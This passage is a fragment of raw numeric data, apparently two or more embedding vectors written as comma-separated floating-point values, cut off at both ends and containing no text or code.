022945067,-0.029190158,0.0068171103,-0.0022098788,0.03761593,0.030707778,0.014844369,-0.015334913,-0.0077059395,-0.034126718,0.0051980335,-0.0033987376,0.028969197,-0.012365,-0.020597285,0.013206585,-0.00873638,-0.02098389,0.016724527,-0.014929468,0.0071140523,0.0005032379,-0.0140202325,-0.007114918,0.015042183,0.00030204962,-0.012962106,0.00757817,0.010794578,0.012715846,0.005795342,-0.010569675,-0.017341081,-0.00075299985,-0.0069375127,0.0057045803,0.012732788,-0.03840726,0.001335183,0.0066078613,-0.009365773,-0.027542,-0.022472039,-0.013434464,-0.01153584,-0.005207445,0.006012441,-0.009576547,0.014413751,0.021318754,0.00063026976,-0.014805272,0.00606754,-0.010971,0.01566862,0.0014431642,-0.023686808,0.004480507,-0.026139738,0.0060079996,-0.012720092,0.0144743845,-0.012768169,-0.026443053,0.011614701,-0.012819797,0.00038934854,0.0012282592,0.0011861797,0.0072760396,-0.017209642,-0.011467659,0.007231738,-0.0059160125,0.0070458003,-0.021878954,0.0055674054,0.026431376,0.022019168,-0.0010835514,0.0087719895,-0.0057425546,-0.019360429,-0.005724944,0.027582392,0.030958302,0.117952324,0.001062297,-0.0005822079,0.015468026,0.021359516,-0.022199105,0.004592913,0.00012436023,0.0020653964,-0.0016981196,0.025213776,-0.015831646,0.0058363685,-0.017772738,-0.023519782,0.022221752,0.009384133,-0.01751501,0.011125813,0.0071823136,0.0031089261,-0.027214086,-0.008317745,-0.048149414,-0.01573259,-0.05360012,0.0052527147,0.023628902,-0.00464859,0.03613858,-0.0041424218,0.0021552637,-0.00035823486,0.011047098,0.0010342716,0.0065196683,-0.0014299348,-0.022652665,-0.014664637,-0.013189114,0.012370012,-0.0035997396,0.0016582585,-0.028794233,-0.02656435,-0.019652644,0.004325771,-0.012073346,-0.0053045806,-0.0044554076,-0.013944982,0.01109735,0.0011078562,-0.0054290076,-0.0046260823,-0.013067706,0.010998392,0.012120019,0.014252738,0.0123314755,0.010732226,0.004869267,0.006967342,-0.0035115166,0.017016105,0.01784005,-0.010067356,-0.0021821863,0.003999196,0.00082050514,0.00061050255,-0.014126266,0.0036461526,-0.012654968,-0.003377578,0.01311913,-0.00551885,0.012599605,0.01747194,-0.0035522901,0.009552727,0.0103391325,0.00043412333,-0.014190069,-0.0063708727,-0.011206772,-0.011279961,0.027423067,-0.013275506,-0.007142851,-0.01202143,0.030673388,0.01463574,0.010459348,-0.012674159,0.01078872,0.024078446,-0.012616109,0.0015124066,0.0041277925,-0.016796952,0.004135846,0.018216824,0.005627292,-0.013765499,0.015273908,-0.020991735,0.016871328,-0.0064826617,-0.0069859773,-0.019982476,0.009929312,-0.0002037237,0.026215274,0.0013060967,0.043144718,-0.010558806,-0.0001370177,0.002523661,-0.008699222,-0.00477467,0.013908029,0.0146224275,0.020071642,0.006815134,0.013606644,-0.008921723,0.008678213,0.010176631,0.0033293394,-0.0037069006,-0.012303963,0.0008313534,0.012536898,-0.010901916,-0.019977702,0.007903346,0.0038661151,-0.009530622,-0.01948965,-0.0012430883,-0.014004562,0.0052490886,-0.010261925,-0.009923714,-0.0072275912,0.042978533,-0.023679815,0.0022309157,0.0007531158,0.0008291334,0.011389488,-0.022832394,-0.001697796,-0.0072686174,-0.024895716,-0.021363461,0.0055559566,0.013424708,0.0065329936,0.03419549,-0.006921834,0.015356496,-0.066227555,0.026169783,0.013864364,0.025676787,0.010769664,-0.0061398037,-0.015723545,-0.011576728,0.009569274,0.009486918,-0.00021960538,-0.0061036097,0.0021168035,0.018274723,0.030188749,-0.025061114,0.014167669,0.016137859,0.00338712,-0.011475746,-0.007963993,0.030004393,-0.015477821,0.005559023,-0.010127199,-0.010870739,0.037969455,-0.0070632817,0.004996166,-0.008177055,0.009144329,-0.02570571,0.015673453,-0.024578063,0.05383358,-0.005616475,-0.03733219,-0.0063642315,0.00007627312,0.0095616905,0.01794488,0.009745153,-0.013121926,0.010269952,-0.010193256,0.005588097,0.021650536,0.02599561,0.0038979142,-0.0008346901,-0.030389126,0.0001293749,0.01226917,0.005764477,-0.0103844255,0.0008254821,-0.0047053103,0.010493374,-0.00064105773,-0.011376083,-0.0021104838,0.012739136,0.016748836,-0.00021052653,0.0016011287,0.02375169,-0.021212744,-0.016363269,0.014834371,-0.012598441,0.02333656,-0.0051064976,0.008978242,0.019725371,0.0037498865,-0.006523932,0.0127263535,-0.03167449,0.010827384,0.0066051134,-0.004305949,-0.019896705,-0.006980729,-0.030934988,0.0071443026,0.016981436,-0.0019456531,-0.024456829,0.0069261556,0.00434044,-0.0040107686,-0.03007973,-0.0056417133,-0.00034064066,0.034649,0.032563064,-0.018478522,0.01741788,0.033490393,-0.017463371,0.011929321,-0.005226754,-0.0029796266,0.0033683463,0.0075040106,-0.01129512,-0.0017147934,-0.01227216,0.017845612,-0.000071225084,0.026611138,0.011720903,0.002142465,0.000028710341,-0.0053381813,0.008147144,-0.005637645,0.026955334,-0.02061459,0.00057462277,-0.013834942,-0.021316295,-0.013942717,0.0013414595,0.019909833,0.04602908,-0.04754981,-0.016195871,0.018037459,0.00474929,-0.0223624,0.04127425,0.001260207,-0.03328111,-0.0212278,-0.0036902847,0.008302171,-0.0022005956,-0.025814308,0.0020588697,0.0023458716,-0.0066357977,0.0053538242,0.0150983725,-0.02007065,-0.01189707,0.015915234,-0.0019965668,-0.0026691337,0.0030921947,0.0025044095,0.0115210675,-0.0073732683,0.01132356,-0.01232326,-0.013951854,-0.00282126,-0.0022645933,-0.03506955,0.003291503,0.01407844,-0.001968412,0.028625643,-0.0028259333,-0.01225553,-0.025585586,0.012143696,-0.004940402,-0.009764251,-0.0057417285,-0.012087233,-0.015516946,0.012264217,0.0035765055,0.12835696,-0.024794696,0.0042077294,0.010239064,0.0077866004,-0.010197931,0.014738329,0.027311496,0.0058276034,0.011283008,0.005612786,-0.0072916136,-0.003072181,0.031794127,0.023306461,-0.009899067,0.0050820573,0.12660037,-0.0032738957,0.022595199,0.013293885,0.006573681,0.009557501,0.011271045,0.025475206,-0.07246496,-0.003918331,-0.04844625,0.005381558,-0.0014075832,-0.018413555,0.016882844,0.0048679295,-0.014908144,0.016777374,0.0024109688,0.006912556,0.017657524,-0.010318689,-0.028631657,0.002816402,0.00057028094,-0.015141484,0.022138473,0.008352383,0.011943546,-0.044299312,0.012183063,-0.0005850632,0.025560876,0.0045082346,-0.02929453,0.0054411828,-0.008458502,0.0031904576,0.0017063232,0.009061286,0.018302642,-0.015046552,-0.006234264,-0.020547306,0.009867892,0.0043547046,0.01242012,-0.010871692,-0.0010288397,-0.013550395,-0.0032371478,-0.015479583,0.010417437,0.029151814,0.009429296,-0.035151962,-0.010531865,0.004974065,0.009543898,-0.002368671,-0.01030863,0.0123589765,0.0016263197,0.039307922,0.017710727,0.005509741,0.018413097,-0.000037511825,0.018922873,0.008140745,0.007543796,0.007223355,0.016414367,0.025152888,0.020523956,-0.015225502,0.00497352,0.027521208,0.017200608,0.008206986,-0.0022479224,-0.00971866,-0.005398138,-0.008189933,0.0027529036,0.00471842,-0.006324888,0.010369992,0.016132787,-0.01581327,-0.031076726,-0.009381355,0.008788642,0.0034949605,-0.006969549,-0.025280297,0.005866332,-0.0149342185,-0.0044352706,-0.016744168,-0.008754932,-0.036709048,-0.0018869963,-0.001795341,-0.0046881754,0.0034880778,-0.019765833,-0.031785637,-0.004118411,0.013285864,0.01811429,-0.012020406,0.006788182,-0.016206484,0.0034235688,-0.0074261036,0.042970397,-0.0013411136,0.0045020767,0.017690342,-0.013832397,-0.015535918,-0.0074209366,-0.03148043,0.005077932,0.0013796696,0.018065346,0.012525352,0.018170843,0.025283914,-0.008196765],[-0.0074851145,0.008086712,-0.021235166,-0.008476047,-0.004882837,-0.0056765233,-0.0025698605,0.004571318,0.0030597344,-0.009485756,0.0054990817,0.0061272727,0.0061497735,0.018928686,-0.008718204,-0.013446251,0.02785359,-0.0007401346,-0.0020981568,0.0021547617,0.011280176,-0.0084612025,0.014633014,-0.013154063,0.0037688084,0.010612225,-0.0016012657,-0.0021345043,0.001708407,0.004969373,-0.0013675692,0.02807565,0.008895215,-0.014832278,0.019528203,0.013664725,-0.023211546,0.0016258338,0.013473873,-0.010515056,-0.013556994,0.016184596,-0.016943315,0.010051004,0.002017104,-0.004820879,-0.018684436,-0.0065873372,-0.005695981,0.0020084167,-0.00977495,0.021669704,-0.004611548,0.02513089,-0.001942344,0.021152152,-0.011348559,-0.012435616,0.019486364,0.011767276,-0.01562524,0.020487085,-0.0064278506,-0.005274493,0.041051306,0.008010887,0.029084047,-0.017290303,-0.004033065,-0.020521415,-0.0024183746,0.008466574,0.003976756,0.0116086155,0.008531134,0.022281233,0.013030118,-0.0029182178,-0.002283445,0.017601527,-0.036671318,0.0011537503,-0.006442763,-0.010653424,-0.017873675,-0.00038448392,0.009165473,-0.009784598,-0.007883753,-0.0077428822,0.0035759434,-0.004102883,0.003466102,0.0022436387,-0.019100921,0.017422887,0.014381184,-0.011971746,-0.010706467,0.01899819,-0.007626962,-0.033081558,-0.01934963,0.005991006,0.008448898,-0.008307643,0.009061721,0.0021635538,0.015112636,-0.015463659,-0.0026903632,-0.008079401,0.016945982,0.007239548,0.0040963106,0.006151835,-0.027500669,0.018440489,-0.001898959,0.0025058307,-0.02304734,0.01291704,-0.012702686,0.0043293177,-0.019188043,-0.0008837474,-0.006910056,0.012099247,-0.00029559055,-0.005731453,-0.0025194185,0.011425194,0.0008706356,0.0027525628,-0.034935847,-0.0037601993,0.010716146,0.028336922,0.0041998564,-0.009484424,0.014093722,-0.00982623,0.008462381,0.008512973,0.0062162527,-0.0065063317,0.0068273908,0.01239632,0.008028256,-0.02433332,-0.013789683,-0.023253368,-0.025275007,-0.0154134175,-0.016841844,0.019441057,-0.026878728,0.0019035975,0.002942933,0.017737027,0.0018505728,0.007776717,0.015395229,0.004834419,0.0063350946,-0.009794205,-0.012340193,0.008460944,-0.008519956,0.01911558,-0.0007533596,0.023591733,0.012245122,-0.0031045806,0.008172777,0.028801948,0.003962146,-0.010238043,-0.015968176,-0.011000124,-0.00043966508,0.0007370318,-0.020348627,0.00043329323,0.00006764274,0.027919108,0.01600996,0.008875664,-0.005152879,-0.026214246,-0.013572922,-0.016112827,0.0014251235,-0.00044628957,-0.019333594,-0.024603913,-0.012819675,0.11620248,-0.013778937,-0.0032253987,-0.0129701095,0.0045414,0.000057520912,-0.028409647,-0.027485285,-0.0034252543,-0.0048106327,-0.011582688,0.010768843,0.018193556,0.012664876,-0.009964853,-0.013029345,0.002890902,-0.005137458,-0.054324083,0.026682828,0.0076654786,-0.01232064,-0.0031746544,-0.020439051,0.012367342,-0.010192021,-0.028427515,-0.011134601,-0.006025701,0.0060125366,-0.0036804162,0.003508511,-0.011638149,0.0055788443,0.013578473,-0.01929727,-0.018561497,0.012116427,-0.010572489,0.0414686,0.009786297,0.004006961,-0.005369134,-0.0069920775,0.0022934086,0.0065787747,0.019427596,-0.022498854,0.0049945503,0.024336487,-0.011521885,-0.010417471,0.019569911,0.005866559,-0.021720625,0.020988313,0.018918209,-0.0021081106,-0.028979339,0.006499061,-0.019234328,0.004934852,0.0068815756,-0.001407955,-0.013767322,-0.0057593924,0.009281193,0.037129853,-0.0030078094,0.0006647646,-0.052529987,-0.0019876154,-0.018306747,-0.051655643,0.014628457,0.0007535296,0.018085884,-0.024724802,-0.014556276,0.017891087,-0.00074848294,-0.007851452,0.0031771273,-0.008890281,0.01454109,-0.013946566,-0.0102489,-0.024594747,0.0007454999,-0.017864045,-0.021392552,0.026390031,0.0078467075,0.0054027666,-0.0025601622,0.007692438,0.012794681,-0.017026061,-0.005247717,-0.007520858,0.019678347,0.009929248,-0.0035230725,-0.009729309,-0.0054061455,0.018681746,0.0020422435,0.014653395,-0.014740866,-0.023059653,0.00916694,-0.001663689,-0.002299984,0.0021532055,-0.0046186545,0.0051959995,-0.003271452,0.004487091,-0.008950713,-0.0018909476,-0.010163458,-0.016820574,0.0009949828,0.029679338,-0.014844039,-0.008361313,-0.03764443,-0.012543704,-0.0095034195,0.016911203,-0.0023442933,0.02314629,0.009945675,-0.005857664,-0.009823863,-0.0028237682,0.02159969,0.0131133385,0.0071026245,-0.008292923,0.021207724,0.008673224,0.015188897,-0.012858864,-0.006396991,-0.030047776,-0.009336846,-0.007080106,0.0030908785,0.005604303,0.024129346,0.013746028,0.007351511,0.01965592,-0.021588523,-0.006985471,-0.016165232,-0.0010766684,-0.022338374,0.010381047,-0.013268592,-0.012232717,-0.013703043,0.021837164,-0.002700503,-0.00893464,0.0031185863,0.08960091,-0.0072717047,-0.009229732,0.016933063,-0.009811576,-0.018561868,0.01811562,-0.00022833708,0.013018021,-0.0081278095,0.004528841,-0.0072657596,-0.013685716,0.013041856,-0.036211737,0.012555773,-0.0170151,-0.026484406,-0.014095442,0.0069711334,0.012000637,-0.025839869,-0.02295392,0.03502173,0.0063794893,0.007433585,0.030433364,-0.0061122733,-0.0053469567,-0.019944329,-0.001696108,-0.026980402,-0.0013454545,-0.004939609,-0.0030108804,0.025937505,-0.0022495477,0.01026609,-0.019780723,-0.010479575,-0.008962923,0.007295725,-0.021941707,0.0030698099,-0.012689593,0.0483971,0.0014735196,-0.01453768,-0.007892467,0.0021134554,0.01019799,0.04292202,-0.018575897,0.01251467,0.016045498,0.01461045,0.01909451,-0.021167884,0.009738405,0.01833679,0.008625417,0.03768945,-0.025887216,0.021490883,0.00074275146,0.034871344,-0.017287936,-0.0050952956,-0.012872057,-0.0066965427,0.010207086,-0.004839307,-0.0047978023,0.013429857,-0.012285608,0.016568044,-0.012458747,0.008425413,-0.00958979,-0.0064004753,-0.0008825976,0.007874575,-0.001270321,0.0003301649,0.0021579703,0.009641059,0.023321472,0.010469927,0.018893901,-0.0035574392,-0.0016375731,-0.005450109,-0.010481427,-0.0045240573,0.019654216,0.0021092284,0.018917946,0.0050807483,0.00057671516,0.006881266,-0.010039566,-0.0063820877,0.0255738,-0.011918676,0.0053566676,0.0050287796,-0.0041539217,-0.004669897,0.00345917,0.010075091,-0.008327143,0.0033539135,-0.004769742,0.0005100864,0.008006066,-0.011637591,0.0013577117,-0.011508928,-0.026048506,0.010795692,0.016781047,-0.0013960766,-0.006215367,-0.0049223774,0.0048198514,0.0134519385,0.002379798,0.014085574,0.022056002,0.0033376059,0.00773174,0.023176143,0.013376872,-0.039777644,0.015339503,0.0053898976,-0.013438511,0.0016214332,0.020143826,0.0008161368,0.0068514887,0.0140388105,0.03312133,0.012089287,0.01605707,0.017840074,0.0186148,0.004474143,-0.014507134,-0.007045765,-0.013034828,-0.007157867,0.023132384,0.008938275,-0.00908064,0.007842639,0.02749224,-0.0072470023,-0.005177151,-0.013019161,0.023331117,-0.030948326,0.015504517,0.011794474,0.007332538,0.002377841,-0.014169194,0.113878556,-0.00015395787,-0.020746248,-0.01964917,-0.005440173,0.019310486,-0.01780722,0.029918686,-0.02593015,-0.0008407124,-0.015381736,0.0016452159,0.014664634,0.013078133,-0.010256074,-0.021382337,0.0014829889,-0.008319937,0.015505017,0.013691926,0.004032119,0.0074175326,0.008323268,-0.016841177,-0.00826717,-0.017844046,0.018076677,0.011282401,-0.0054062633,-0.019148353,-0.0043054637,-0.0058514224,0.014488343,-0.0005908264,0.008543202,0.0020532403,0.003373695,0.01050145,-0.0056592505,0.032346252,-0.0091012195,0.0069368845,-0.015268367,-0.005962473,0.013091098,0.013201769,-0.003223844,-0.003840211,0.011821765,0.011016309,-0.0064787352,0.012803111,0.017369373,0.007025429,0.016122501,0.0005879821,0.0030008652,0.017168552,-0.005046971,-0.0019614582,-0.004291953,0.0038066967,-0.0023730658,0.0000828089,-0.0030669887,0.0023853772,0.020343108,-0.012593274,-0.006689283,-0.040588994,-0.016076203,0.020713948,-0.008113049,0.013182211,0.030353129,0.0013472654,0.0069536916,0.027072322,0.0013522786,0.0021039527,0.0022241215,0.007339106,-0.00560934,0.005052058,-0.013762775,-0.0016356593,-0.012723645,-0.010545375,0.00055220793,-0.016956871,0.0075236196,0.009205165,0.012422566,-0.0037222493,-0.00083249406,0.00025486175,0.011481164,-0.034126155,-0.0014099902,0.002347686,-0.016271202,0.015763585,-0.013614355,0.030063128,-0.00593254,-0.005697523,-0.008040068,-0.017492669,0.016215347,-0.00239097,-0.0020595798,-0.042580996,0.0137014445,0.020340243,0.0043634055,-0.015583576,0.028367747,0.011361629,-0.009289537,0.0069557317,0.011182031,-0.029236306,0.003431988,0.008574393,-0.014750847,0.00987474,0.013879738,-0.025693126,0.0029899182,-0.013694118,-0.020840922,-0.010063494,0.022262935,0.001310471,0.0032482978,0.012149121,0.0050950497,-0.009281583,0.01340028,-0.010068747,-0.014433499,0.002384511,0.026273774,-0.013395769,-0.005518332,0.009517861,0.0007034489,-0.014917206,-0.021243209,0.0023935651,0.0041808854,0.016535776,-0.01081561,-0.010291584,-0.011468674,-0.013099075,0.02590499,-0.007933975,0.020425823,-0.008338753,0.032359827,-0.008536471,0.007827924,0.01999738,0.002475213,-0.013020234,0.0011103753,-0.0135530345,0.032548074,-0.023031522,-0.011386116,0.021069555,0.005187968,0.014877931,-0.002748588,0.016025981,0.005251226,0.023780545,0.017401993,0.032206297,0.0029006747,0.014336992,0.018876785,0.016342804,0.008076564,-0.00060260866,0.016975118,-0.000017319004,0.017470052,0.010869775,0.019169686,-0.028121062,-0.012340995,-0.015636528,0.0109896865,0.014777021,0.0068795546,0.019344285,-0.013422595,-0.0013571641,0.0015265525,0.004830675,-0.0030154139,-0.022316452,0.0013666195,-0.0032411155,-0.024480272,0.018314997,-0.03988361,-0.0092905285,0.009976524,0.003391179,-0.017767867,-0.0073143095,-0.0079944385,-0.017273387,0.008259427,-0.027726412,-0.009201428,0.009487852,0.035782512,-0.0025417435,0.01645604,-0.0043059606,0.008655517,0.0009042832,0.006655246,-0.0056306035,-0.01405094,-0.008115232,-0.015720963,-0.00011453026,0.014608671,0.009216144,-0.02698043,-0.014025563,-0.002621913,-0.0056649856,-0.0032576695,0.0002653068,-0.007467183,0.024967695,0.010661236,-0.003376197,-0.0074520805,-0.0028239498,-0.0274247,-0.0042496487,-0.021267103,-0.008049126,-0.012466881,-0.000031458385,-0.0015956264,0.025993193,-0.035022452,0.013971666,0.01488004,-0.0075218556,0.017511478,-0.00023385505,-0.0012513415,0.015196014,0.015338452,-0.0072569367,-0.0061313366,-0.012443545,0.03337889,-0.012446683,0.0040991306,-0.018189123,-0.029712688,0.00029636276,-0.007358693,0.016003657,-0.016598195,0.008089477,-0.008527629,-0.009680122,0.030456727,-0.007612033,0.019818557,0.022497753,-0.011782563,0.002299395,-0.0028754023,0.019520843,-0.017908674,-0.006929618,0.029393509,-0.0021384244,0.0036541473,0.0031895938,-0.042830314,-0.016786572,-0.018024804,0.027587568,-0.0020942013,0.031136408,-0.0005245549,-0.015311944,-0.003485671,0.00081294565,-0.0022850165,-0.016117217,-0.033531982,-0.0018888277,0.013898684,-0.0134569965,0.017433962,0.0073556514,-0.015586608,-0.0027398446,-0.016276756,-0.022148035,0.0145332655,0.0023140884,0.014501456,-0.00063420925,0.005796998,-0.005385657,-0.018818934,0.008411155,-0.026891552,0.004402264,0.0054412247,0.005843707,0.014351959,0.036818076,-0.010404929,-0.010261805,-0.006532244,0.002350121,0.007599122,-0.012988416,-0.0077976245,-0.00015868092,0.0052155866,0.012911263,0.019789957,0.0052456404,0.017015979,0.018910358,0.002356222,-0.02978601,-0.034889564,0.0067390664,0.01809345,-0.0013420864,0.005946726,0.009216378,0.017814606,0.020131612,0.016356003,-0.010128964,0.01469857,-0.009417217,0.01439547,-0.015587125,-0.008414787,-0.02289714,-0.012617456,0.0099679995,-0.018319566,-0.01147482,0.0013423506,0.0021076524,0.024349462,0.011826435,0.016308222,-0.0102877645,-0.0052762227,0.018729419,0.007257763,0.006862417,-0.016812943,0.0048880605,-0.036006916,0.019559745,0.018062789,-0.01715149,-0.0027880052,-0.00045364496,-0.0016117234,-0.0063916156,0.017607344,0.0009688244,-0.032554183,-0.005773843,-0.024113975,0.013999667,-0.000022635242,0.0063617704,0.01743318,0.0067782095,-0.0014757931,0.025827143,-0.00030250743,-0.028706627,0.011161847,0.0012668442,0.00030756084,-0.0077321925,0.008180591,0.021149645,-0.006111039,0.008884263,0.002655688,-0.08663211,0.006504661,0.0013419205,-0.022471352,-0.031452596,0.020688962,0.008909466,0.009917314,0.024884747,-0.01917973,-0.008455454,0.010503873,0.0009349553,0.0073817656,0.002745207,-0.016585883,0.007418723,0.008997284,0.02262018,-0.0059001883,0.010426294,-0.00843199,0.008686925,0.0018899697,0.022286048,-0.031754237,0.019332668,-0.01549742,-0.008694258,0.008831773,0.00030719585,0.017004577,-0.0028197572,-0.0070195855,-0.013526322,-0.028356813,0.010636544,0.013310216,-0.0060555856,0.007838745,0.0051397122,-0.018247759,0.0050731753,0.023584723,-0.0110590765,-0.04222841,0.0028619624,0.0028348342,0.011514863,-0.013925411,0.012575135,-0.009829728,0.02269795,0.012437809,0.0025470306,0.015453837,-0.01872978,-0.012494334,0.0110729225,-0.0052766427,0.02091444,0.0029135128,0.011600083,0.0039738277,-0.025428953,0.0033551964,0.023838274,0.019431664,-0.012514622,-0.031529304,-0.008240134,-0.009996075,-0.024893532,0.0023589137,-0.018118208,0.019428542,0.008758967,0.015613136,-0.0019574931,0.008666087,-0.026817666,-0.0064914734,-0.027976055,-0.010078897,-0.03063173,0.0026247352,0.009089499,0.0033768408,0.0026103714,-0.0058627464,-0.0058036833,0.0019188934,0.0002674529,-0.0014007408,0.011200518,0.007236716,0.0093975365,-0.00071069173,-0.0012493699,-0.0032016714,0.005269681,-0.0075761992,0.0029014468,0.05380765,-0.015400259,0.0008973068,0.003884285,0.02030484,0.007249734,0.026420046,-0.003430188,0.00030140812,-0.006043179,0.033388052,0.0145464,-0.0000878322,-0.010341433,0.01861669,-0.0041833045,0.0066265385,0.04430178,0.0007362976,0.017082373,0.005051581,-0.0034218908,-0.019322306,0.0072228517,0.0019112967,-0.02818089,0.0050519,0.012402862,0.0020374581,-0.006754955,0.00236265,0.016098563,0.011728045,-0.004495847,-0.012733562,-0.011351246,-0.00054628414,0.005164476,-0.008447784,-0.020196605,0.0028285703,0.04631376,-0.02374808,-0.009713969,0.01939753,0.009399185,0.023373371,0.012633909,0.004535704,0.012093021,-0.008625773,-0.018626267,-0.009619881,-0.0039643496,-0.014661837,-0.0001949781,-0.0067667835,-0.0074018156,0.0006848448,-0.010978259,-0.009531212,-0.062988155,0.008541995,-0.005089406,-0.0066855345,0.008022763,-0.008017981,0.0006603881,0.0018494317,0.019928912,0.019998265,0.0017587319,0.011109806,0.0044418396,0.010015753,-0.016878663,0.0071375906,-0.0140582295,0.03844798,-0.0075014005,-0.011337751,0.0060330047,-1.5932295e-7,-0.0037391302,-0.012661342,-0.023996832,-0.029999185,-0.013035771,-0.0068332283,-0.0015983502,0.015794313,-0.012924633,0.037636746,-0.00041338213,-0.009717081,0.014593262,0.004047314,-0.0063684885,0.031334814,0.0246654,-0.019007344,-0.00817632,0.006774461,0.005550437,-0.012526927,-0.01194365,0.0055834088,0.005477875,0.0051574684,0.0036588872,0.004295499,-0.0013418712,-0.0039326777,-0.020040233,0.010018141,0.015302515,-0.026790978,0.0123781,-0.0022465277,-0.0031140822,0.0061269235,0.013688849,0.008707396,0.022370588,0.009708756,0.0005289719,-0.018513562,0.04509351,-0.0129697975,0.0017539021,0.015407636,-0.00801482,-0.01037429,-0.024203362,0.004457892,-0.032321177,-0.014942909,0.002352265,0.012334401,0.021641543,-0.01768158,0.011189147,0.02438626,-0.016945103,0.00330587,-0.0087990295,0.02529453,-0.0013591024,-0.001741872,0.028649554,0.009839785,-0.00452111,0.005304791,-0.02999992,0.006034218,-0.024972124,-0.024603153,-0.013270775,-0.009816084,-0.009635786,-0.005849029,0.00044961876,-0.0032457828,0.0005391063,0.024482403,0.010759212,-0.0067884284,-0.016435355,-0.040602017,0.01622356,0.006834134,0.005256619,0.0023285472,-0.0173785,-0.010806893,0.013281331,0.0172145,0.01177218,-0.0060091093,-0.01571089,-0.021954095,0.007071651,0.027100392,0.010537445,-0.03909371,0.022196187,0.002602936,-0.006074229,-0.0068191877,0.017827714,0.029585315,0.0012467297,-0.0010316502,-0.0034483206,-0.016923213,0.015661145,-0.024201773,0.09331875,-0.03053699,0.0037836875,0.00017538761,0.0045800675,-0.0027552848,0.012620837,0.018883191,0.023537526,-0.009086318,-0.035537478,-0.0061922036,-0.00067603047,-0.0092644505,0.025546497,-0.013142954,-0.0028423625,0.002541911,-0.011453161,0.009816348,0.012720492,0.0074101845,0.0024080537,0.01640202,-0.0020714921,0.018938445,0.0026918445,0.00574055,-0.010320645,0.005592116,-0.016483508,-0.04338698,0.015604861,0.03473768,0.010950712,0.011062763,0.010084713,-0.006413095,-0.009756089,0.025803328,0.0038891963,-0.012547575,0.06968056,-0.0073075453,-0.006443742,-0.007643416,-0.010427402,0.012163277,0.0269719,0.015301138,0.017163154,-0.01108176,-0.010517886,-0.00031676108,-0.040250678,-0.0050167246,0.006109916,0.023750246,0.009295368,-0.018798687,-0.0058691804,-0.00068231294,0.0052441955,0.025231453,-0.01613794,-0.011821661,0.02514875,-0.007606596,0.020679893,-0.013858106,0.002113664,0.015837286,-0.0096847555,0.029002257,-0.02364942,-0.0041149682,0.011670722,-0.024266424,-0.002098635,-0.009462996,0.0007717385,0.005833046,0.0386677,0.013888823,-0.01740426,-0.009133787,0.0009336973,-0.00051601534,0.087486655,0.009661766,0.01505269,0.0029623352,-0.0046441047,0.01135053,0.015217876,0.026879,0.003928408,0.0022286682,-0.012660788,0.03645792,-0.009399919,0.012884263,0.024391437,-0.007739538,-0.007938448,0.006384212,0.013072601,-0.00088351686,0.006822517,0.02098229,0.031545267,-0.006337811,-0.0058034332,0.0044969777,0.017139083,-0.005062995,0.0036275627,-0.0036965339,-0.005057167,-0.013667008,-0.002376178,-0.014120433,-0.013428096,-0.05935565,-0.0022892454,0.16728096,-0.008401574,0.02056162,0.019437425,-0.018274026,0.0049818372,-0.111531965,0.008393401,0.015382619,-0.019776536,-0.029197067,-0.0027921088,-0.009442888,0.019409928,-0.0012339011,0.010156498,-0.00048787505,-0.008871589,0.031124335,-0.016703416,-0.0038951084,0.0012847771,0.020019062,0.014303278,-0.017440649,-0.014605364,0.033493947,-0.016662901,-0.011809437,-0.011862107,0.0071341107,0.0104466695,0.019151194,0.000010357547,0.0012863791,-0.0003976877,0.02484121,-0.0073096477,-0.013628928,-0.0060348725,0.016897386,0.008989599,-0.041173812,-0.03412373,-0.18482566,0.011783159,-0.014178834,-0.024081672,0.011859911,0.008356688,0.0109673925,-0.00768123,0.016840663,0.0016417886,0.004797054,0.024469873,-0.0046490887,0.016527563,-0.0018438381,0.00761118,0.008889442,0.0073648114,0.014460974,-0.0026306969,0.026102172,0.0076022837,0.0065896483,-0.022902695,-0.0020115736,-0.006023865,-0.005555918,0.0072320965,-0.005020412,-0.0042641684,-0.020307781,-0.026972346,-0.014086187,-0.008203789,-0.009631216,-0.027336372,-0.026884187,0.0011282915,-0.024557821,0.013285819,0.0017117383,-0.0151328035,-0.008492072,-0.0000026375794,-0.0010418451,0.035647165,0.007243244,-0.011380688,0.0017843093,0.0041871723,0.034418296,-0.003148208,-0.0231818,-0.00035638476,0.022764757,-0.011444862,0.0026936946,-0.030314673,-0.026914177,0.01328668,-0.015321788,-0.006451743,-0.025581313,-0.018802987,0.03270951,0.00047656018,0.017811798,-0.013864372,-0.004607318,0.018430982,0.0004710057,-0.009410411,0.013570528,-0.017916646,0.022316957,0.012200563,-0.00670625,0.0028125679,0.0072388556,-0.01709657,0.011078193,-0.008694918,-0.007562534,-0.022834882,-0.01838053,0.0067977402,-0.037190758,-0.009798835,0.00078929786,-0.010913414,0.011176753,-0.013682534,0.04297361,0.017447306,0.0079184435,0.008333536,0.02230066,0.015475108,-0.017535351,0.008797976,0.01028075,-0.020358654,-0.005331683,-0.030081457,-0.027539857,0.0018423178,0.0008034549,-0.013328108,-0.010848729,-0.0017562843,-0.0003375007,0.0047172015,-0.00021780666,-0.025751738,-0.010979231,-0.023867337,0.030535828,-0.017493734,0.0057683103,-0.01845838,-0.024623541,-0.019327572,-0.030043183,0.0159946,0.034883395,0.012397287,-0.035661206,-0.010777841,0.0068480545,-0.009695993,-0.03801756,-0.024888681,0.012386716,-0.0046184487,0.008386442,-0.009661845,-0.0115336515,0.009277142,-0.019171717,-0.0060133548,-0.020400744,-0.012131532,-0.0030316699,-0.007597466,0.014338321,-0.03444961,0.04067363,0.0060516954,0.0058334614,0.010940165,0.024704764,0.041703876,-0.023763172,0.00034853615,-0.004322453,0.07901136,-0.013713527,-0.026005358,-0.0023805464,-0.019859508,-0.002922832,0.014399985,-0.0062742755,-0.016928056,-0.017404754,0.000860084,0.013691155,-0.0038599668,0.0072416496,-0.004459551,0.017418472,0.004248944,-0.0008278382,0.00066900114,0.012339458,0.016364316,-0.022785533,-0.016034363,0.045904435,0.013264651,0.019219136,0.009588213,0.024593158,-0.012557891,0.0024127334,-0.0039675967,-0.005862841,-0.010414642,-0.008863241,0.013741998,-0.045265727,-0.01611437,0.0028083879,-0.00047045358,-0.017312301,-0.0051925043,0.0037236458,0.019174252,-0.0027738563,-0.0018268626,-0.011248774,0.0027793632,0.0022379414,-0.01319173,0.0066326624,0.008945566,0.030234866,0.009760811,0.00066179334,-0.007274422,0.0026452278,0.00601169,-0.013650296,0.014485356,-0.010557347,0.05086349,-0.009669982,-0.022646388,0.0050120386,-0.000029547014,-0.0006835557,0.001150617,-0.013044514,-0.0010124032,0.010781413,-0.003032232,-0.008636244,-0.000963221,0.013945003,-0.0025185628,-0.008162289,0.006234086,-0.011672364,-0.019385641,-0.0010904227,0.006319746,